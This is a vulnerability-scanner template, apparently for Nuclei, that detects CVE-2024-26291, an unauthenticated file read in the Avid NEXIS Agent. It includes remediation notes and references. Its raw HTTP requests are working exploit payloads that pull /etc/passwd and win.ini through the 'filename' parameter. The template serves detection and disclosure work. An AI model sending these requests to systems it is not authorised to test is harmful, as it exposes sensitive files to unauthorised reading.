id: CVE-2024-26291 info: name: Avid NEXIS Agent - Arbitrary File Read author: DhiyaneshDK severity: high description: | Avid NEXIS E-series, F-series, PRO+, and System Director Appliance (SDA+) before 2025.5.1 contain an unauthenticated arbitrary file read caused by improper validation of the filename parameter, letting unauthenticated attackers read sensitive files, exploit requires no authentication. impact: | Unauthenticated attackers can read sensitive files with highest privileges, potentially exposing critical information. remediation: Upgrade to Avid NEXIS version 2025.5.1 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2024-26291 - https://raeph123.github.io/BlogPosts/Avid_Nexis/Advisory_Avid_Nexus_Agent_Multiple_Vulnerabilities_en.html - https://kb.avid.com/pkb/articles/troubleshooting/en239659 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-26291 epss-score: 0.01204 epss-percentile: 0.79276 cwe-id: CWE-285 metadata: verified: true max-request: 2 vendor: avid product: nexis fofa-query: body="Avid Nexis" tags: cve,cve2024,avid,nexis,lfi,file-read,gsoap flow: http(1) || http(2) http: - raw: - | GET /logs?filename=%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl name: linux dsl: - 'status_code == 200' - 'contains(body, "root:")' - 'contains(header, "gSOAP")' condition: and - raw: - | GET /logs?filename=C%3A%5CWindows%5Cwin.ini HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl name: windows dsl: - 'status_code == 200' - 'contains(body, "[fonts]") || contains(body, "[extensions]")' - 'contains(header, "gSOAP")' condition: and # digest: 4b0a00483046022100cc1a7156f8aee0eca3dc362a20308d4eebb3803b7ae84d70e10802dd7ed631b8022100c6de8fbdaf9ca9e26a537ae19814464cd104959bc0dedcf1262172e02528294d:922c64590222798bb761d5b6d8e72950